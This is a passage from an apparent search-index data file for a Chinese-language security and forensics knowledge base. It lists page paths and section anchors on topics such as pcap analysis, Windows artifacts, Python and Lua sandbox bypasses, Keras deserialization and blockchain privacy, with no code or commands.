ces/basic-forensic-methodology/pcap-inspection/index.html#yarapcap","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/index.html#恶意软件分析","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/index.html#zeek","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/index.html#连接信息","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/index.html#dns-信息","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/index.html#其他-pcap-分析技巧","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.html#dnscat-pcap-分析","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#suricata--iptables-cheatsheet","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#iptables","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#chains","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#suricata","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#安装与配置","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.html#规则定义","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.html#usb-keystrokes","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#wifi-pcap-分析","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#检查-bssid","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#暴力破解","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#信标中的数据--侧信道","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#在-wifi-网络中查找未知-mac-地址","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.html#解密流量","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#wireshark技巧","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#提升你的wireshark技能","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#教程","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#分析信息","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#过滤器","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#搜索","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#免费pcap实验室","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#识别域名","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#识别本地主机名","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#从dhcp","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#从nbns","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#解密tls","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#使用服务器私钥解密https流量","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#使用对称会话密钥解密https流量","generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.html#adb通信","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/index.html#特定软件文件类型技巧","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#反编译已编译的python二进制文件exe-elf---从pyc中提取","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#从已编译的二进制文件到pyc","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#从-pyc-到-python-代码","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#错误未知的魔术数字-227","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#错误反编译通用错误","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#自动工具","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#importerror-文件名unpackedmalware_3exe-pycache-archivecpython-35pyc-不存在","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#分析-python-汇编","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#python-转为可执行文件","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#使用-py2exe-创建有效载荷","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#使用-pyinstaller-创建有效载荷","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.html#参考","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#浏览器伪影","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#浏览器伪影-1","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#firefox","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#google-chrome","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#sqlite-db-data-recovery","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#internet-explorer-11","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#metadata-storage","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#cache-inspection","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#cookies-management","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#download-details","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#browsing-history","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#typed-urls","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#microsoft-edge","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#safari","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#opera","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.html#references","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.html#echo","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.html#评论","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.html#测试","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.html#将数据写入文件","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.html#本地云存储","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.html#onedrive","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.html#google-drive","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.html#dropbox","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.html#office-file-analysis","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#pdf-文件分析","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#常见恶意构造","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#静态分析备忘单","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#最近的攻击技术2023-2025年","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#yara快速规则模板","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#防御提示","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.html#参考文献","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.html","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#结构化文件格式漏洞检测-0click-chains","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#为什么用结构而不是签名","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#pdfjbig2--forcedentry-cve202130860","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#webpvp8l--blastpass-cve20234863","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#truetype--triangulation-cve202341990","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#dngtiff--cve202543300","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#implementation-patterns-and-performance","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#dfir-提示与边缘情况","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#相关工具","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/structural-file-format-exploit-detection.html#references","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.html#参考文献","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#zips-技巧","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#在-apk-中使用被操纵的-zip-头部的反逆向技巧","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#1-伪造加密设置-gpbf-第-0-位但没有真正的加密","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#2-大自定义-extra-fields-来破坏-parsers","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#3-文件目录名称冲突隐藏真实工件","generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.html#参考","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-artifacts","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#通用-windows-伪影","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-10-通知","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#时间线","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#ads备用数据流","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#文件备份","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#回收站","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#卷影复制","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#office-自动保存文件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#shell-项","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#最近文档-lnk","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#jumplists","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#shellbags","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#使用-windows-usb","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#注册表信息","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#setupapi","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#usb-detective","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#plug-and-play-cleanup","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#电子邮件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-mail-应用","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#microsoft-outlook","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#microsoft-outlook-ost-文件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#检索附件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#thunderbird-mbox-文件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#图像缩略图","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-注册表信息","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#工具","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#恢复已删除元素","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#最后写入时间","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#sam","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-注册表中的有趣条目","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#执行的程序","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#基本-windows-进程","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-recent-apps","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#bam-后台活动调节器","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-prefetch","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#superprefetch","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#srum","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#appcompatcache-shimcache","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#amcache","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#recentfilecache","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#计划任务","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#服务","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-store","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#windows-事件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#理解-windows-安全事件日志","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#用户身份验证的关键事件-id","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#恢复-windows-事件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/index.html#通过-windows-事件识别常见攻击","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#有趣的-windows-注册表键","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#windows-版本和所有者信息","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#计算机名称","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#时区设置","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#访问时间跟踪","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#windows-版本和服务包","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#启用最后访问时间","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#网络信息详细信息","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#客户端缓存-csc","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#自动启动程序","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#shellbags","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#usb-信息和取证","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#卷序列号","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#关机详细信息","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#网络配置","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#共享文件夹","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#自动启动的程序","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#搜索和输入的路径","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#最近的文档和-office-文件","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#最近使用的-mru-项目","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#用户活动跟踪","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#shellbags-分析","generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.html#usb-设备历史","generic-methodologies-and-resources/python/index.html#python-沙箱逃逸与-pyscript","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#bypass-python-sandboxes","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#命令执行库","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#bypass-pickle-sandbox-with-the-default-installed-python-packages","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#默认包","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#pip-package","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#eval-ing-python-code","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#其他允许-eval-python-code-的库","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#运算符和小技巧","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#通过编码绕过防护-utf-7","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#无法调用时的-python-执行","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#rce-with--decorators","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#rce-创建对象和重载","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#更多-rce","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#使用-builtins-help--license-读取文件","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#内置","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#no-builtins","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#builtins-payloads","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#globals-and-locals","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#发现任意执行","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#寻找已加载的危险库","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#递归搜索-builtins-globals","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#python-format-string","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#敏感信息披露-payloads","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#llm-jails-bypass","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#从-format-到-rce加载库","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#解析-python-对象","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#访问函数代码","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#获取代码信息","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#反汇编函数","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#编译-python","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#创建-code-object","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#重新创建一个已-leaked-的函数","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#绕过防御","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#反编译已编译的-python","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#python-杂项","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#assert","generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#参考资料","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#load_name--load_const-opcode-oob-read","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#tldr","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#overview","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#out-of-bound-read","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#生成利用代码","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#exploit-script","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#版本说明和受影响的操作码-python-311313","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#用于有用-oob-索引的快速扫描器-311312-兼容","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#最小字节码-rce-模式-co_consts-oob--builtins--evalinput","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#沙箱的防御检查和缓解措施","generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.html#参考文献","generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.html#reportlabxhtml2pdf--expression-evaluation-rce-cve-2023-33733","generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.html#类污染python-的原型污染","generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.html#基本示例","generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.html#基本漏洞示例","generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.html#gadget-examples","generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.html#参考","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#keras-model-deserialization-rce-and-gadget-hunting","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#keras-model-格式内部","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#cve-2024-3660--lambda-layer-bytecode-rce","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#cve-2025-1550--keras--38-中的任意模块导入","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#允许列表内的后置-gadget-攻击面","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#researcher-toolkit","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#防御建议","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#针对-aiml-模型的-ml-pickle-导入允许列表-fickling","generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.html#references","generic-methodologies-and-resources/python/python-internal-read-gadgets.html#python-internal-read-gadgets","generic-methodologies-and-resources/python/python-internal-read-gadgets.html#基本信息","generic-methodologies-and-resources/python/python-internal-read-gadgets.html#flask---读取密钥","generic-methodologies-and-resources/python/python-internal-read-gadgets.html#werkzeug---machine_id-和-node-uuid","generic-methodologies-and-resources/python/pyscript.html#pyscript","generic-methodologies-and-resources/python/pyscript.html#pyscript-渗透测试指南","generic-methodologies-and-resources/python/pyscript.html#从-emscripten-虚拟内存文件系统中转储检索文件","generic-methodologies-and-resources/python/pyscript.html#emscripten虚拟内存文件系统的oob数据外泄控制台监控","generic-methodologies-and-resources/python/pyscript.html#跨站脚本攻击-普通","generic-methodologies-and-resources/python/pyscript.html#跨站脚本攻击-python-混淆","generic-methodologies-and-resources/python/pyscript.html#跨站脚本攻击-javascript-混淆","generic-methodologies-and-resources/python/pyscript.html#dos攻击无限循环","generic-methodologies-and-resources/python/pyscript.html#新的漏洞与技术-2023-2025","generic-methodologies-and-resources/python/pyscript.html#通过不受控制的重定向进行的服务器端请求伪造-cve-2025-50182","generic-methodologies-and-resources/python/pyscript.html#任意包加载与供应链攻击","generic-methodologies-and-resources/python/pyscript.html#输出清理更改-2023","generic-methodologies-and-resources/python/pyscript.html#防御最佳实践","generic-methodologies-and-resources/python/pyscript.html#参考文献","generic-methodologies-and-resources/python/venv.html#venv","generic-methodologies-and-resources/python/web-requests.html#web-requests","generic-methodologies-and-resources/python/web-requests.html#python-requests","generic-methodologies-and-resources/python/web-requests.html#python-cmd-以利用-rce","generic-methodologies-and-resources/python/bruteforce-hash-few-chars.html","generic-methodologies-and-resources/python/basic-python.html#基础-python","generic-methodologies-and-resources/python/basic-python.html#python-基础","generic-methodologies-and-resources/python/basic-python.html#有用的信息","generic-methodologies-and-resources/python/basic-python.html#主要操作","generic-methodologies-and-resources/python/basic-python.html#元组","generic-methodologies-and-resources/python/basic-python.html#列表-数组","generic-methodologies-and-resources/python/basic-python.html#字典","generic-methodologies-and-resources/python/basic-python.html#集合","generic-methodologies-and-resources/python/basic-python.html#类","generic-methodologies-and-resources/python/basic-python.html#map-zip-filter-lambda-sorted-和一行代码","generic-methodologies-and-resources/python/basic-python.html#异常","generic-methodologies-and-resources/python/basic-python.html#assert","generic-methodologies-and-resources/python/basic-python.html#生成器yield","generic-methodologies-and-resources/python/basic-python.html#正则表达式","generic-methodologies-and-resources/python/basic-python.html#装饰器","generic-methodologies-and-resources/threat-modeling.html#威胁建模","generic-methodologies-and-resources/threat-modeling.html#威胁建模-1","generic-methodologies-and-resources/threat-modeling.html#常用场景","generic-methodologies-and-resources/threat-modeling.html#威胁模型概述","generic-methodologies-and-resources/threat-modeling.html#cia三元组","generic-methodologies-and-resources/threat-modeling.html#威胁建模方法","generic-methodologies-and-resources/threat-modeling.html#工具","generic-methodologies-and-resources/threat-modeling.html#spidersuite","generic-methodologies-and-resources/threat-modeling.html#owasp-threat-dragon","generic-methodologies-and-resources/threat-modeling.html#microsoft-threat-modeling-tool","blockchain/blockchain-and-crypto-currencies/index.html#基本概念","blockchain/blockchain-and-crypto-currencies/index.html#共识机制","blockchain/blockchain-and-crypto-currencies/index.html#比特币基础知识","blockchain/blockchain-and-crypto-currencies/index.html#交易","blockchain/blockchain-and-crypto-currencies/index.html#闪电网络","blockchain/blockchain-and-crypto-currencies/index.html#比特币隐私问题","blockchain/blockchain-and-crypto-currencies/index.html#匿名获取比特币","blockchain/blockchain-and-crypto-currencies/index.html#比特币隐私攻击","blockchain/blockchain-and-crypto-currencies/index.html#比特币隐私攻击总结","blockchain/blockchain-and-crypto-currencies/index.html#共同输入所有权假设","blockchain/blockchain-and-crypto-currencies/index.html#utxo找零地址检测","blockchain/blockchain-and-crypto-currencies/index.html#示例","blockchain/blockchain-and-crypto-currencies/index.html#社交网络与论坛曝光","blockchain/blockchain-and-crypto-currencies/index.html#交易图分析","blockchain/blockchain-and-crypto-currencies/index.html#不必要输入启发式最优找零启发式","blockchain/blockchain-and-crypto-currencies/index.html#示例-1","blockchain/blockchain-and-crypto-currencies/index.html#强制地址重用","blockchain/blockchain-and-crypto-currencies/index.html#正确的钱包行为","blockchain/blockchain-and-crypto-currencies/index.html#其他区块链分析技术","blockchain/blockchain-and-crypto-currencies/index.html#流量分析","blockchain/blockchain-and-crypto-currencies/index.html#更多","blockchain/blockchain-and-crypto-currencies/index.html#匿名比特币交易","blockchain/blockchain-and-crypto-currencies/index.html#匿名获取比特币的方法","blockchain/blockchain-and-crypto-currencies/index.html#混合服务","blockchain/blockchain-and-crypto-currencies/index.html#coinjoin","blockchain/blockchain-and-crypto-currencies/index.html#payjoin","blockchain/blockchain-and-crypto-currencies/index.html#加密货币隐私的最佳实践","blockchain/blockchain-and-crypto-currencies/index.html#钱包同步技术","blockchain/blockchain-and-crypto-currencies/index.html#利用-tor-实现匿名性","blockchain/blockchain-and-crypto-currencies/index.html#防止地址重用","blockchain/blockchain-and-crypto-currencies/index.html#交易隐私策略","blockchain/blockchain-and-crypto-currencies/index.html#门罗币匿名性的灯塔","blockchain/blockchain-and-crypto-currencies/index.html#以太坊燃料费和交易","blockchain/blockchain-and-crypto-currencies/index.html#理解燃料费","blockchain/blockchain-and-crypto-currencies/index.html#执行交易","blockchain/blockchain-and-crypto-currencies/index.html#参考文献","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#绕过-lua-沙箱嵌入式-vm游戏客户端","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#枚举沙箱环境","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#如果暴露了-ioos可以直接执行命令","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#通过-auto-run-callbacks-的-zero-click-触发器","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#在侦察期间要搜索的危险原语","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#可选升级abusing-lua-bytecode-loaders","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#检测与加固说明供防御者","generic-methodologies-and-resources/lua/bypass-lua-sandboxes/index.html#references","generic-hacking/archive-extraction-path-traversal.html#archive-extraction-path-traversal-zip-slip--winrar-cve-2025-8088","generic-hacking/archive-extraction-path-traversal.html#概述","generic-hacking/archive-extraction-path-traversal.html#根本原因","generic-hacking/archive-extraction-path-t